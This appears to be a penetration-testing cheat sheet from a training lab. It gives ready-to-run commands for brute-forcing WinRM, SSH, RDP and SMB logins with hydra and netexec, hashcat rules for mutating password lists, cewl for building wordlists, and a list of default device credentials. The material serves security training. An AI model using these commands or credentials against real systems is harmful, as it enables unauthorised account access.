# Installation
sudo apt-get -y install crackmapexec
# Basic Usage
netexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>
# Example
netexec winrm 10.129.42.197 -u user.list -p password.list# Installation
sudo gem install evil-winrm
# Usage
evil-winrm -i <target-IP> -u <username> -p <password># Brute force with Hydra
hydra -L user.list -P password.list ssh://<target-IP>
# Standard connection
ssh <user>@<target-IP># Brute force with Hydra
hydra -L user.list -P password.list rdp://<target-IP>
# Connect with xFreeRDP
xfreerdp /v:<target-IP> /u:<username> /p:<password># Brute force with Hydra
hydra -L user.list -P password.list smb://<target-IP>
# Using Metasploit
use auxiliary/scanner/smb/smb_login
# List shares with netexec
netexec smb $ip -u "$user" -p "$password" --shares
# Connect to shares with smbclient
smbclient -U "$user" \\\\$ip\\$SHARE# Example custom rule file (custom.rule)
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
# Generate mutations
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list# Basic syntax
cewl <URL> -d <depth> -m <min_word_length> --lowercase -w <output_file>
# Example
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlistZyxel (ssh): zyfwp:PrOw!aN_fXp
APC UPS (web): apc:apc
Weblogic (web): system:manager
Kali Linux (OS): kali:kali
D-Link (web): admin:admin# Basic syntax
hydra -C <user_pass.list> <protocol>://<IP>
# Example
hydra -C default_creds.list ssh://10.129.42.197